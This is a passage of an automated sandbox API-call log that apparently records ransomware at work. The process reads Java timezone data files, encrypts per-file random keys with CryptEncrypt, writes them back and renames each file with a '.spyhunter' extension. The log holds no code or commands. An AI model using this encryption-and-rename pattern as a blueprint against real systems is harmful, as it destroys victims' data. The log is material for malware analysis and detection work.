[0169.647] StrStrW (lpFirst="Ashgabat", lpSrch=".txt") returned 0x0 [0169.647] GetProcessHeap () returned 0x2c0000 [0169.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.647] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e51c*=0x10d, lpOverlapped=0x0) returned 1 [0169.647] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffef3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.647] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10d, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e51c*=0x10d, lpOverlapped=0x0) returned 1 [0169.648] GetProcessHeap () returned 0x2c0000 [0169.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.648] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.648] WriteFile (in: hFile=0x9c, lpBuffer=0x248e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x248e55c*, lpNumberOfBytesWritten=0x248e51c*=0x4, lpOverlapped=0x0) returned 1 [0169.648] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e51c*=0x30, lpOverlapped=0x0) returned 1 [0169.648] CloseHandle (hObject=0x9c) returned 1 [0169.648] GetProcessHeap () returned 0x2c0000 [0169.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.648] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.spyhunter") returned 67 [0169.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat.spyhunter")) returned 1 [0169.649] GetProcessHeap () returned 0x2c0000 [0169.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.649] GetProcessHeap () returned 0x2c0000 [0169.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.649] GetProcessHeap () returned 0x2c0000 [0169.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9ac0 | out: hHeap=0x2c0000) returned 1 [0169.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e560 | out: pbBuffer=0x248e560) returned 1 [0169.649] GetProcessHeap () returned 0x2c0000 [0169.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e558*=0x30) returned 1 [0169.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.650] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe") returned 55 [0169.650] StrStrW (lpFirst="Aqtobe", lpSrch=".txt") returned 0x0 [0169.650] GetProcessHeap () returned 0x2c0000 [0169.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.650] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e51c*=0x1c5, lpOverlapped=0x0) returned 1 [0169.651] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.651] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1c5, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e51c*=0x1c5, lpOverlapped=0x0) returned 1 [0169.651] GetProcessHeap () returned 0x2c0000 [0169.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.651] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.651] WriteFile (in: hFile=0x9c, lpBuffer=0x248e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x248e55c*, lpNumberOfBytesWritten=0x248e51c*=0x4, lpOverlapped=0x0) returned 1 [0169.651] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e51c*=0x30, lpOverlapped=0x0) returned 1 [0169.651] CloseHandle (hObject=0x9c) returned 1 [0169.651] GetProcessHeap () returned 0x2c0000 [0169.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.651] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.spyhunter") returned 65 [0169.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe.spyhunter")) returned 1 [0169.652] GetProcessHeap () returned 0x2c0000 [0169.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.652] GetProcessHeap () returned 0x2c0000 [0169.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.652] GetProcessHeap () returned 0x2c0000 [0169.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26b88 | out: hHeap=0x2c0000) returned 1 [0169.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e558 | out: pbBuffer=0x248e558) returned 1 [0169.652] GetProcessHeap () returned 0x2c0000 [0169.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e550*=0x30) returned 1 [0169.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.653] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau") returned 54 [0169.653] StrStrW (lpFirst="Aqtau", lpSrch=".txt") returned 0x0 [0169.653] GetProcessHeap () returned 0x2c0000 [0169.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.653] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e514*=0x1c5, lpOverlapped=0x0) returned 1 [0169.654] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.654] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1c5, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e514*=0x1c5, lpOverlapped=0x0) returned 1 [0169.654] GetProcessHeap () returned 0x2c0000 [0169.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.654] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.654] WriteFile (in: hFile=0x9c, lpBuffer=0x248e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x248e554*, lpNumberOfBytesWritten=0x248e514*=0x4, lpOverlapped=0x0) returned 1 [0169.654] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e514*=0x30, lpOverlapped=0x0) returned 1 [0169.654] CloseHandle (hObject=0x9c) returned 1 [0169.654] GetProcessHeap () returned 0x2c0000 [0169.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.654] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.spyhunter") returned 64 [0169.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau.spyhunter")) returned 1 [0169.655] GetProcessHeap () returned 0x2c0000 [0169.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.655] GetProcessHeap () returned 0x2c0000 [0169.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.655] GetProcessHeap () returned 0x2c0000 [0169.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26ad0 | out: hHeap=0x2c0000) returned 1 [0169.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e558 | out: pbBuffer=0x248e558) returned 1 [0169.655] GetProcessHeap () returned 0x2c0000 [0169.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.656] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e550*=0x30) returned 1 [0169.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.684] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr") returned 55 [0169.684] StrStrW (lpFirst="Anadyr", lpSrch=".txt") returned 0x0 [0169.684] GetProcessHeap () returned 0x2c0000 [0169.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.684] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e514*=0x249, lpOverlapped=0x0) returned 1 [0169.685] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.685] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e514*=0x249, lpOverlapped=0x0) returned 1 [0169.685] GetProcessHeap () returned 0x2c0000 [0169.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.685] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.685] WriteFile (in: hFile=0x9c, lpBuffer=0x248e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x248e554*, lpNumberOfBytesWritten=0x248e514*=0x4, lpOverlapped=0x0) returned 1 [0169.686] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e514, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e514*=0x30, lpOverlapped=0x0) returned 1 [0169.686] CloseHandle (hObject=0x9c) returned 1 [0169.686] GetProcessHeap () returned 0x2c0000 [0169.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.686] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.spyhunter") returned 65 [0169.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr.spyhunter")) returned 1 [0169.696] GetProcessHeap () returned 0x2c0000 [0169.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.696] GetProcessHeap () returned 0x2c0000 [0169.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.696] GetProcessHeap () returned 0x2c0000 [0169.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26a18 | out: hHeap=0x2c0000) returned 1 [0169.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e550 | out: pbBuffer=0x248e550) returned 1 [0169.696] GetProcessHeap () returned 0x2c0000 [0169.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e548*=0x30) returned 1 [0169.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.698] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson") returned 61 [0169.698] StrStrW (lpFirst="Mawson", lpSrch=".txt") returned 0x0 [0169.698] GetProcessHeap () returned 0x2c0000 [0169.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.698] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e50c*=0x4d, lpOverlapped=0x0) returned 1 [0169.699] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.699] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e50c*=0x4d, lpOverlapped=0x0) returned 1 [0169.700] GetProcessHeap () returned 0x2c0000 [0169.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.700] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.700] WriteFile (in: hFile=0x9c, lpBuffer=0x248e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x248e54c*, lpNumberOfBytesWritten=0x248e50c*=0x4, lpOverlapped=0x0) returned 1 [0169.700] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e50c*=0x30, lpOverlapped=0x0) returned 1 [0169.700] CloseHandle (hObject=0x9c) returned 1 [0169.700] GetProcessHeap () returned 0x2c0000 [0169.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.701] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.spyhunter") returned 71 [0169.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson.spyhunter")) returned 1 [0169.701] GetProcessHeap () returned 0x2c0000 [0169.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.702] GetProcessHeap () returned 0x2c0000 [0169.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.702] GetProcessHeap () returned 0x2c0000 [0169.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba750 | out: hHeap=0x2c0000) returned 1 [0169.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e550 | out: pbBuffer=0x248e550) returned 1 [0169.702] GetProcessHeap () returned 0x2c0000 [0169.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e548*=0x30) returned 1 [0169.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.703] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie") returned 64 [0169.703] StrStrW (lpFirst="Macquarie", lpSrch=".txt") returned 0x0 [0169.703] GetProcessHeap () returned 0x2c0000 [0169.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.703] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e50c*=0x311, lpOverlapped=0x0) returned 1 [0170.753] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.753] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e50c*=0x311, lpOverlapped=0x0) returned 1 [0170.853] GetProcessHeap () returned 0x2c0000 [0170.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0170.853] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.853] WriteFile (in: hFile=0x9c, lpBuffer=0x248e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x248e54c*, lpNumberOfBytesWritten=0x248e50c*=0x4, lpOverlapped=0x0) returned 1 [0170.853] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e50c*=0x30, lpOverlapped=0x0) returned 1 [0170.853] CloseHandle (hObject=0x9c) returned 1 [0170.853] GetProcessHeap () returned 0x2c0000 [0170.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.853] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.spyhunter") returned 74 [0170.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie.spyhunter")) returned 1 [0170.855] GetProcessHeap () returned 0x2c0000 [0170.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.855] GetProcessHeap () returned 0x2c0000 [0170.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0170.855] GetProcessHeap () returned 0x2c0000 [0170.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04ed8 | out: hHeap=0x2c0000) returned 1 [0170.855] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e548 | out: pbBuffer=0x248e548) returned 1 [0170.855] GetProcessHeap () returned 0x2c0000 [0170.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0170.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e540*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e540*=0x30) returned 1 [0170.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0170.856] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik") returned 58 [0170.856] StrStrW (lpFirst="Inuvik", lpSrch=".txt") returned 0x0 [0170.856] GetProcessHeap () returned 0x2c0000 [0170.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0170.856] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e504*=0x424, lpOverlapped=0x0) returned 1 [0170.997] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbdc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.997] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e504*=0x424, lpOverlapped=0x0) returned 1 [0170.998] GetProcessHeap () returned 0x2c0000 [0170.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0170.998] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.998] WriteFile (in: hFile=0x9c, lpBuffer=0x248e544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x248e544*, lpNumberOfBytesWritten=0x248e504*=0x4, lpOverlapped=0x0) returned 1 [0170.998] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e504*=0x30, lpOverlapped=0x0) returned 1 [0170.998] CloseHandle (hObject=0x9c) returned 1 [0170.998] GetProcessHeap () returned 0x2c0000 [0170.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.998] wnsprintfW (in: 